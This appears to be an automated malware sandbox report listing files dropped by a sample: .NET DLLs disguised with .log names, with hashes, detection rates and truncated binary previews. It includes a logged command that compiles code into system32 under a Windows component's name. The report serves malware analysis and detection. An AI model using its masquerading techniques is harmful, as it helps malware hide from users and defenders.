                                                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\rmvercvh\rmvercvh.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                  C:\Users\user\Desktop\84f3811bb1c48b

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:ASCII text, with very long lines (347), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):347
                                                                  Entropy (8bit):5.770543158126212
                                                                  Encrypted:false
                                                                  SSDEEP:6:IKSLIp1XkVlJ6KPICtM9AAAaY+uOGeTvUxDMaWN39u4cu5kcFmnOXzzOshEH2DNk:IKpkLLI+OAahLcxDMaWBcIkN4ZmkNkus
                                                                  MD5:C5A8A1F5C5DE3582DE547053DA38321C
                                                                  SHA1:AB5A20FA8423CFA749C011B73C7D15361C79D4C7
                                                                  SHA-256:63511F7BCF3674A90AEBB6024515FB3D770DAD8C3AB314F5259431A8C3A4CC45
                                                                  SHA-512:93DEBDCE036B826742FA2971E677014784476D6D704008A78B1CC2B541F82B94EC8E016473B445334C2ED09C17243A26BD0F7D5F00F73333EFC8CAD7E399D963
                                                                  Malicious:false
                                                                  Preview:6F5sdKi2zUqI5X9HnmLXfJLuzzSaEvZPxw2pbp0wsTa1MzkLtwK6Jlzw4K2n1IyD4aUIeUq7wZpMtTiAPHrSldFL7GvRxM4keW6vebqZFMJu6nCkm2YuagcbUJLYiYKkfErXWwfyaRMYTVOUDKp5xKJ84fbVPR0rCjO25pNzWjTJUEI841VYtPwU4tc1VJiJafVuGWYX6ziO0An0XcaY6c7xw47LMWeNBKszsY2ic7b3rie4Fme3tKM8hi7MZMLkVVMqSyH8k159ADGOZCGk2kd07tRJapJQw1iWVxmRefT1PN7dctwWGlsu1Wsig8i4spNIfu2mayFWRlluwyrr2xJLJxe

                                                                  C:\Users\user\Desktop\AFZZLiTQ.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                  • Antivirus: Virustotal, Detection: 29%, Browse
                                                                  Joe Sandbox View:
                                                                  • Filename: iN1fhAtzW2.exe, Detection: malicious, Browse
                                                                  • Filename: based.exe, Detection: malicious, Browse
                                                                  • Filename: 4Awb1u1GcJ.exe, Detection: malicious, Browse
                                                                  • Filename: rvNK8fDa0k.exe, Detection: malicious, Browse
                                                                  • Filename: RustChecker.exe, Detection: malicious, Browse
                                                                  • Filename: KPFv8ATDx0.exe, Detection: malicious, Browse
                                                                  • Filename: LzmJLVB41K.exe, Detection: malicious, Browse
                                                                  • Filename: KKjubdmzCR.exe, Detection: malicious, Browse
                                                                  • Filename: T0jSGXdxX5.exe, Detection: malicious, Browse
                                                                  • Filename: s5duotgoYD.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\BCBhhiiL.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                  • Antivirus: Virustotal, Detection: 16%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\BdpSDMGd.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                  • Antivirus: Virustotal, Detection: 16%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\BuRPCyHG.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                  • Antivirus: Virustotal, Detection: 11%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\BwVbAMfc.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):9728
                                                                  Entropy (8bit):5.0168086460579095
                                                                  Encrypted:false
                                                                  SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                  MD5:69546E20149FE5633BCBA413DC3DC964
                                                                  SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                  SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                  SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                  • Antivirus: Virustotal, Detection: 1%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

                                                                  C:\Users\user\Desktop\BzfkqkWQ.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\CYASrcKR.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                  C:\Users\user\Desktop\CpOixJXm.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\CqvSLBwK.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\CufHpEgE.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 29%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\DfbAZvLY.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\DmprTJmg.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\EFxianyZ.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                  C:\Users\user\Desktop\EhArHZqU.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\FsrYoeiE.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\GbyyMOOB.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\GeNRoyLy.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):9728
                                                                  Entropy (8bit):5.0168086460579095
                                                                  Encrypted:false
                                                                  SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                  MD5:69546E20149FE5633BCBA413DC3DC964
                                                                  SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                  SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                  SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

                                                                  C:\Users\user\Desktop\GpTgJexz.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
